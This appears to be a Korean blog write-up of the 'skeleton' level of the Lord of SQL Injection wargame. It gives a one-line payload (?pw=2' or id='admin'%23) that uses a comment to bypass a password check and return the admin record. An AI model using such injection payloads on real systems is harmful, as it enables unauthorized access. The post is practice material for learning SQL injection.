티스토리 뷰
'prob', '_', '.', '()' 에 필터링이 걸려있다. 이를 우회해서 id = 'admin'인 레코드를 반환받으면 된다. 주석인 #을 이용하면 쉽게 해결가능한 문제이다.
?pw=2' or id='admin'%23 을 입력하면
query : select id from prob_skeleton where id='guest' and pw='2' or id='admin'#' and 1=0
에서 파란색 밑줄친 id='admin' 이라는 조건에 맞는 레코드가 반환되면서 문제가 클리어된다.
'hacking > LOS' 카테고리의 다른 글
<LOS> - 12번(darkknight) (0) | 2018.04.09 |
---|---|
<LOS> - 11번(golem) (0) | 2018.04.09 |
<LOS> - 9번(vampire) (0) | 2018.04.09 |
<LOS> - 8번(troll) (0) | 2018.04.06 |
<LOS> - 7번(orge) (0) | 2018.04.06 |